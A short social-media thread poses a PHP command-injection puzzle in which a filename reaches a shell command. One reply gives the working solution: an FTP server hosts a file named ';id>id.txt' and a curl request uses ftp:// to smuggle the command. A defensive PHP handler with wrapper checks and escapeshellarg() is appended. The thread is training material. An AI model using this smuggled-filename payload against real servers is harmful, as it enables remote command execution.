Had this on a recent engagement and thought I'd provide a cut-down version as a fun little CTF-like challenge.

As an attacker, you can invoke `pwnme()` and control the value of `$filename` via a web request.

You cannot control the contents of the file system that this code is running on. You don't have the ability to upload files.

How do you achieve command injection?

#php #challenge

@oj Okay, I finally got it! I had trouble with Docker's networking, but it now definitely works. I ran @justinsteven's Docker image for the challenge. Then in another Docker image (172.17.0.4), I ran a vsftpd server with a file called ';id>id.txt'. Now I can run `curl 'http://localhost:8000/index.php?filename=ftp://172.17.0.4/;id%3Eid.txt'` which outputs the results of the id command into http://localhost:8000/id.txt.

@kevinfarrow Well done :) Cute little challenge I reckon!
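
A defensive take on the bug class solved in this thread, as an added example that is not part of the original posts or the challenge code. It assumes `pwnme()` checked that `$filename` exists and then used it in a shell command (the challenge source is not shown here); `BASE_DIR`, `safe_path()`, `handle()` and the `wc -c` command are hypothetical.

```php
<?php
// Added example: hypothetical hardened handler. BASE_DIR, safe_path(),
// handle() and `wc -c` are assumptions; the challenge's pwnme() is not shown.
const BASE_DIR = '/var/www/data';

/** Return a canonical local path under BASE_DIR, or null to reject. */
function safe_path(string $filename): ?string
{
    // Reject anything shaped like a stream wrapper URL (ftp://, php://, ...).
    // PHP's ftp:// wrapper answers file_exists()/is_file() over the network,
    // so "the file exists" does not imply "the file is on our disk".
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $filename)
        || !stream_is_local($filename)) {
        return null;
    }
    // Allow-list the name: no path separators, no shell metacharacters.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,128}\z/', $filename)) {
        return null;
    }
    // Resolve symlinks and ".." and confirm the result stays in BASE_DIR.
    $prefix = BASE_DIR . DIRECTORY_SEPARATOR;
    $real = realpath($prefix . $filename);
    if ($real === false || !is_file($real)
        || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

function handle(string $filename): string
{
    $path = safe_path($filename);
    if ($path === null) {
        return 'rejected';
    }
    // Even after validation, quote the argument and end option parsing;
    // never interpolate request input into a command string.
    return (string) shell_exec('wc -c -- ' . escapeshellarg($path));
}

// Constructed inputs, including the filename shape used in the thread.
// A clean name is still rejected if no such file exists under BASE_DIR.
$samples = ['report.txt', 'ftp://172.17.0.4/;id>id.txt', '../etc/passwd', 'a;id'];
foreach ($samples as $in) {
    printf("%-32s => %s\n", $in, safe_path($in) === null ? 'rejected' : 'accepted');
}
```

Either control alone would have stopped the solution above: the wrapper check defeats the remote existence test, and `escapeshellarg()` keeps a hostile filename a single argument.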